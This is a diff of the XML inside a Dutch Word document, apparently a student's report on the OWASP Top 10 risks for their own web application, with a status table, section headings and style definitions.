+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="4531" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Sensitive Data Exposure</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4531" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFC000" w:themeFill="accent4"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+            <w:r>
+              <w:t>Niet van toepassing</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="4531" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>XML External Entities (XXE)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4531" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFC000" w:themeFill="accent4"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+            <w:r>
+              <w:t>Niet van toepassing</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="4531" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Broken Access Control</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4531" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFC000" w:themeFill="accent4"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="4531" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Security Misconfiguration</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4531" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="70AD47" w:themeFill="accent6"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="4531" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Cross-Site Scripting XSS</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4531" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="70AD47" w:themeFill="accent6"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="4531" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Insecure Deserialization</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4531" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="70AD47" w:themeFill="accent6"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+            <w:r>
+              <w:t>Niet van toepassing</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="4531" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Using Components with Known Vulnerabilities</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4531" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="70AD47" w:themeFill="accent6"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="4531" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Insufficient Logging &amp; Monitoring</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4531" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+            <w:r>
+              <w:t>Niet van toepassing</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Sommige risks zijn niet van toepassing op mijn applicatie toch zijn sommige risk toch wel automatisch afgevangen door het framework. Hier over kunt u verder lezen in de “hoe heb ik dit opgelost” kopjes. </w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rStyle w:val="Heading2Char"/>
         </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="2" w:name="_Toc42881039"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Heading2Char"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Heading2Char"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Injection.</w:t>
       </w:r>
       <w:bookmarkEnd w:id="2"/>
@@ -3031,7 +3447,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc42011031"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc42881040"/>
       <w:r>
         <w:t>Maar aan welke senarios kun je dan denken?</w:t>
       </w:r>
@@ -3613,9 +4029,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc42011032"/>
-      <w:r>
-        <w:lastRenderedPageBreak/>
+      <w:bookmarkStart w:id="4" w:name="_Toc42881041"/>
+      <w:r>
         <w:t>Hoe kun je deze hacks voorkomen?</w:t>
       </w:r>
       <w:bookmarkEnd w:id="4"/>
@@ -3672,7 +4087,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc42011033"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc42881042"/>
       <w:r>
         <w:t>Hoe heb ik dit opgelost?</w:t>
       </w:r>
@@ -3702,6 +4117,7 @@
           <w:noProof/>
           <w:lang w:eastAsia="nl-NL"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
@@ -4715,7 +5131,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc42011034"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc42881043"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Broken Authentication</w:t>
@@ -4731,7 +5147,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc42011035"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc42881044"/>
       <w:r>
         <w:t>Maar aan welke senarios kun je dan denken?</w:t>
       </w:r>
@@ -4768,7 +5184,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc42011036"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc42881045"/>
       <w:r>
         <w:t>Hoe kun je deze hacks voorkomen?</w:t>
       </w:r>
@@ -4838,7 +5254,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc42011037"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc42881046"/>
       <w:r>
         <w:t>Hoe heb ik dit opgelost?</w:t>
       </w:r>
@@ -4878,7 +5294,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc42011038"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc42881047"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Sensitive Data Exposure</w:t>
@@ -4894,7 +5310,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc42011039"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc42881048"/>
       <w:r>
         <w:t>Maar aan welke senarios kun je dan denken?</w:t>
       </w:r>
@@ -4964,7 +5380,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc42011040"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc42881049"/>
       <w:r>
         <w:t>Hoe kun je deze hacks voorkomen?</w:t>
       </w:r>
@@ -5070,7 +5486,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc42011041"/>
+      <w:bookmarkStart w:id="13" w:name="_Toc42881050"/>
       <w:r>
         <w:t>Hoe heb ik dit opgelost?</w:t>
       </w:r>
@@ -5114,7 +5530,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="14" w:name="_Toc42011042"/>
+      <w:bookmarkStart w:id="14" w:name="_Toc42881051"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>XML External Entities (XXE)</w:t>
@@ -5130,7 +5546,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="_Toc42011043"/>
+      <w:bookmarkStart w:id="15" w:name="_Toc42881052"/>
       <w:r>
         <w:t>Maar aan welke scenario’s kun je dan denken?</w:t>
       </w:r>
@@ -5699,7 +6115,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="16" w:name="_Toc42011044"/>
+      <w:bookmarkStart w:id="16" w:name="_Toc42881053"/>
       <w:r>
         <w:t>Hoe kun je deze hacks voorkomen?</w:t>
       </w:r>
@@ -5769,7 +6185,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="17" w:name="_Toc42011045"/>
+      <w:bookmarkStart w:id="17" w:name="_Toc42881054"/>
       <w:r>
         <w:t>Hoe heb ik dit opgelost?</w:t>
       </w:r>
@@ -5801,7 +6217,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="18" w:name="_Toc42011046"/>
+      <w:bookmarkStart w:id="18" w:name="_Toc42881055"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Broken Access Control</w:t>
@@ -5817,7 +6233,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="19" w:name="_Toc42011047"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc42881056"/>
       <w:r>
         <w:t>Maar aan welke scenario’s kun je dan denken?</w:t>
       </w:r>
@@ -6162,7 +6578,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="20" w:name="_Toc42011048"/>
+      <w:bookmarkStart w:id="20" w:name="_Toc42881057"/>
       <w:r>
         <w:t>Hoe kun je deze hacks voorkomen?</w:t>
       </w:r>
@@ -6234,7 +6650,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc42011049"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc42881058"/>
       <w:r>
         <w:t>Hoe heb ik dit opgelost?</w:t>
       </w:r>
@@ -6265,7 +6681,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="22" w:name="_Toc42011050"/>
+      <w:bookmarkStart w:id="22" w:name="_Toc42881059"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Security Misconfiguration</w:t>
@@ -6281,7 +6697,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="23" w:name="_Toc42011051"/>
+      <w:bookmarkStart w:id="23" w:name="_Toc42881060"/>
       <w:r>
         <w:t>Maar aan welke scenario’s kun je dan denken?</w:t>
       </w:r>
@@ -6339,7 +6755,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="24" w:name="_Toc42011052"/>
+      <w:bookmarkStart w:id="24" w:name="_Toc42881061"/>
       <w:r>
         <w:t>Hoe kun je deze hacks voorkomen?</w:t>
       </w:r>
@@ -6397,7 +6813,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="25" w:name="_Toc42011053"/>
+      <w:bookmarkStart w:id="25" w:name="_Toc42881062"/>
       <w:r>
         <w:t>Hoe heb ik dit opgelost?</w:t>
       </w:r>
@@ -6432,7 +6848,7 @@
           <w:tab w:val="left" w:pos="3780"/>
         </w:tabs>
       </w:pPr>
-      <w:bookmarkStart w:id="26" w:name="_Toc42011054"/>
+      <w:bookmarkStart w:id="26" w:name="_Toc42881063"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Cross-Site Scripting XSS</w:t>
@@ -6451,7 +6867,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="27" w:name="_Toc42011055"/>
+      <w:bookmarkStart w:id="27" w:name="_Toc42881064"/>
       <w:r>
         <w:t>Maar aan welke scenario’s kun je dan denken?</w:t>
       </w:r>
@@ -6534,7 +6950,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="28" w:name="_Toc42011056"/>
+      <w:bookmarkStart w:id="28" w:name="_Toc42881065"/>
       <w:r>
         <w:t>Hoe kun je deze hacks voorkomen?</w:t>
       </w:r>
@@ -6592,7 +7008,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="29" w:name="_Toc42011057"/>
+      <w:bookmarkStart w:id="29" w:name="_Toc42881066"/>
       <w:r>
         <w:t>Hoe heb ik dit opgelost?</w:t>
       </w:r>
@@ -6621,7 +7037,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="30" w:name="_Toc42011058"/>
+      <w:bookmarkStart w:id="30" w:name="_Toc42881067"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Insecure Deserialization</w:t>
@@ -6637,7 +7053,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="31" w:name="_Toc42011059"/>
+      <w:bookmarkStart w:id="31" w:name="_Toc42881068"/>
       <w:r>
         <w:t>Maar aan welke scenario’s kun je dan denken?</w:t>
       </w:r>
@@ -6715,7 +7131,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="32" w:name="_Toc42011060"/>
+      <w:bookmarkStart w:id="32" w:name="_Toc42881069"/>
       <w:r>
         <w:t>Hoe kun je deze hacks voorkomen?</w:t>
       </w:r>
@@ -6785,7 +7201,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="33" w:name="_Toc42011061"/>
+      <w:bookmarkStart w:id="33" w:name="_Toc42881070"/>
       <w:r>
         <w:t>Hoe heb ik dit opgelost?</w:t>
       </w:r>
@@ -6793,8 +7209,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>/</w:t>
-      </w:r>
+        <w:t>Het deserializeren wordt opgevangen door het framework zelf deze kun is te configuren naar wens.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Alle data binding word gedaan door jackson. Ik gebruik in mijn app de laatste versie dit houd in dat ik ben beveiligd tegen deserialization. Ook rest data werkt op de laatste release versie. </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="34" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="34"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6813,12 +7234,12 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="34" w:name="_Toc42011062"/>
+      <w:bookmarkStart w:id="35" w:name="_Toc42881071"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Using Components with Known Vulnerabilities</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="34"/>
+      <w:bookmarkEnd w:id="35"/>
     </w:p>
     <w:p>
       <w:r>
@@ -6829,11 +7250,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="35" w:name="_Toc42011063"/>
+      <w:bookmarkStart w:id="36" w:name="_Toc42881072"/>
       <w:r>
         <w:t>Maar aan welke scenario’s kun je dan denken?</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="35"/>
+      <w:bookmarkEnd w:id="36"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6854,11 +7275,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="36" w:name="_Toc42011064"/>
+      <w:bookmarkStart w:id="37" w:name="_Toc42881073"/>
       <w:r>
         <w:t>Hoe kun je deze hacks voorkomen?</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="36"/>
+      <w:bookmarkEnd w:id="37"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6900,11 +7321,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="37" w:name="_Toc42011065"/>
+      <w:bookmarkStart w:id="38" w:name="_Toc42881074"/>
       <w:r>
         <w:t>Hoe heb ik dit opgelost?</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="37"/>
+      <w:bookmarkEnd w:id="38"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6926,12 +7347,12 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="38" w:name="_Toc42011066"/>
+      <w:bookmarkStart w:id="39" w:name="_Toc42881075"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Insufficient Logging &amp; Monitoring</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="38"/>
+      <w:bookmarkEnd w:id="39"/>
     </w:p>
     <w:p>
       <w:r>
@@ -6942,11 +7363,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="39" w:name="_Toc42011067"/>
+      <w:bookmarkStart w:id="40" w:name="_Toc42881076"/>
       <w:r>
         <w:t>Maar aan welke scenario’s kun je dan denken?</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="39"/>
+      <w:bookmarkEnd w:id="40"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6988,11 +7409,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="40" w:name="_Toc42011068"/>
+      <w:bookmarkStart w:id="41" w:name="_Toc42881077"/>
       <w:r>
         <w:t>Hoe kun je deze hacks voorkomen?</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="40"/>
+      <w:bookmarkEnd w:id="41"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7046,11 +7467,11 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="41" w:name="_Toc42011069"/>
+      <w:bookmarkStart w:id="42" w:name="_Toc42881078"/>
       <w:r>
         <w:t>Hoe heb ik dit opgelost?</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="41"/>
+      <w:bookmarkEnd w:id="42"/>
     </w:p>
     <w:p>
       <w:r>
@@ -9793,6 +10214,158 @@
       <w:lang w:eastAsia="nl-NL"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="table" w:styleId="TableGrid">
+    <w:name w:val="Table Grid"/>
+    <w:basedOn w:val="TableNormal"/>
+    <w:uiPriority w:val="39"/>
+    <w:rsid w:val="00E21863"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:tblPr>
+      <w:tblBorders>
+        <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+      </w:tblBorders>
+    </w:tblPr>
+  </w:style>
+  <w:style w:type="table" w:styleId="GridTable1Light-Accent4">
+    <w:name w:val="Grid Table 1 Light Accent 4"/>
+    <w:basedOn w:val="TableNormal"/>
+    <w:uiPriority w:val="46"/>
+    <w:rsid w:val="00E21863"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:tblPr>
+      <w:tblStyleRowBandSize w:val="1"/>
+      <w:tblStyleColBandSize w:val="1"/>
+      <w:tblBorders>
+        <w:top w:val="single" w:sz="4" w:space="0" w:color="FFE599" w:themeColor="accent4" w:themeTint="66"/>
+        <w:left w:val="single" w:sz="4" w:space="0" w:color="FFE599" w:themeColor="accent4" w:themeTint="66"/>
+        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="FFE599" w:themeColor="accent4" w:themeTint="66"/>
+        <w:right w:val="single" w:sz="4" w:space="0" w:color="FFE599" w:themeColor="accent4" w:themeTint="66"/>
+        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="FFE599" w:themeColor="accent4" w:themeTint="66"/>
+        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="FFE599" w:themeColor="accent4" w:themeTint="66"/>
+      </w:tblBorders>
+    </w:tblPr>
+    <w:tblStylePr w:type="firstRow">
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+      </w:rPr>
+      <w:tblPr/>
+      <w:tcPr>
+        <w:tcBorders>
+          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="FFD966" w:themeColor="accent4" w:themeTint="99"/>
+        </w:tcBorders>
+      </w:tcPr>
